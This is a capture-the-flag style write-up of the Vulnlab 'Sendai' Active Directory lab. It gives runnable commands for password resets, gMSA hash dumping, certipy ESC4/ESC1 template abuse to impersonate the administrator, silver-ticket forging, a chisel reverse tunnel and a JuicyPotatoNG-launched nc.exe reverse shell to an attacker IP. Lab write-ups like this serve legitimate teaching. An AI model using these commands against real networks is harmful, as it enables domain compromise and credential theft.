Vulnlab — Sendai

ARZ101
6 min readMay 10, 2024

Sendai involved enumerating usernames through smb shares having password expired, resetting their password, belonging to Support group they had GenericAll on ADMSVC group which had ReadGMSAPassword on MGTSVC$ , enumerating the system to find clifford’s password which was part of ca-operators group having full control over SendaiComputer template making it vulnerable to ESC4, then changing the configuration to make it vulnerable to ESC1, escalating to domain admin.

PORT      STATE SERVICE       VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: GET
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.sendai.vl
| Issuer: commonName=dc.sendai.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-04T16:24:01
| Not valid after: 2024-11-03T16:24:01
| MD5: 6198fc32527e478294e38fd5c6a2b81e
|_SHA-1: 73b4d1026b49e0cb9c0d633982377e74f32b7db3
|_ssl-date: 2024-05-05T16:28:56+00:00; -1m22s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open unknown
56740/tcp open unknown
56744/tcp open unknown

PORT 80/443

Running gobuster, we can find /service

However this endpoints shows that we don’t have access to it

PORT 445

Enumerating smb shares with anonymous login, we’ll see config, sendai and Users share, where config was not accessible, Users didn't anything but sendai had some interesting files

The incident talked about users having weak passwords, all users will be prompted to change their password on logging in, the transfer directory had user’s directories

Resetting domain user’s password

These users can also be enumerated through lookupsid by brute forcing sids

On trying to login with null password, we’ll get two users with password to be changed

Password can be changed with impacket-smbpasswd

impacket-smbpasswd  sendai.vl/Thomas.Powell@dc.sendai.vl -newpass '$aduwu123'

From config share, we can grab .sqlconfig having credentials to MSSQL

But this service isn’t exposed to us so moving on to enumerating the domain with bloodhound

python3 bloodhound.py -u sqlsvc -p password -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.104.41

Thomas.Powell is a member of Support group has GenericAll on ADMSVC group which has ReadGMSAPassword on MGTSVC$ account. We'll need to add thomas in ADMSVC group, read the NThash of MGTSVC account

Abusing GenericAll and reading GMSA password

Through bloodyAD we can add thomas in ADMSVC group having genericall rights

python3 bloodyAD.py  --host "10.10.104.41" -d 'sendai.vl' -u 'thomas.powell' -p '$aduwu123' add groupMember ADMSVC thomas.powell

With gmsadumper script or with netexec we can dump the nthash of mgtsvc account

python3 gMSADumper.py -u 'thomas.powell' -p '$aduwu123' -d sendai.vl -l 10.10.104.41

This account can login on DC as it’s part of Remote Management group

Checking the privileges after logging in through evil-winrm, it doesn’t have any privilege that we can abuse to get local admin

Obtaining clifford’s password

From the running process, we have helpdesk which doesn’t normally run on a system

Enumerating the system with PrivescCheck.ps1

This will list down the running processes from where we’ll find the clifford.davey’s creds

Enumerating ADCS

This user belongs to CA-Operators group, so he likely will be able to enroll in a custom template, enumerating templates with certipy

Escalating privileges through ESC4

certipy find -u clifford.davey -vulnerable -target dc.sendai.vl -dc-ip 10.10.115.126 -stdout

This lists down a template SendaiComputer which has EKU set to Client Authentication that can be used to authenticate on the system and ca-operators group has Full control over this template which means we can edit this template and impersonate as the domain admin, which is known as ESC4 (access control) abuse

With certipy, we can change the configuration of this template to allow domain users to enroll for this template and impersonate any user

certipy template -u clifford.davey -target dc.sendai.vl -dc-ip 10.10.115.126 -template SendaiComputer
certipy req -u 'clifford.davey' -ca 'sendai-DC-CA' -dc-ip 10.10.115.126 -target dc.sendai.vl -template 'SendaiComputer' -upn administrator
certipy auth -pfx ./administrator.pfx -domain sendai.vl

Escalating with SeImpersonate privilege

Another way of escalating privileges is through mssql, since mssql is running internally, having access on the machine we can port forward withchisel

chisel server -p 2222 --reverse
chisel.exe client 10.8.0.136:2222 R:socks

But we’ll get login denied for sqlsvc account

With ticketer, forging a silver ticket for accessing MSSQL service as an administrator

ticketer.py -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -nthash hash Administrator

Enabling xp_cmdshell which will allow us to execute system commands as sqlsvc

The difference here is that we’ll have SeImpersonate privilege, which can abuse to get local admin

Using juicypotato-ng to abuse the privilege and get a shell a SYSTEM

.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\Users\sqlsvc\nc.exe 10.8.0.136 4444 -e cmd.exe"

References

--

--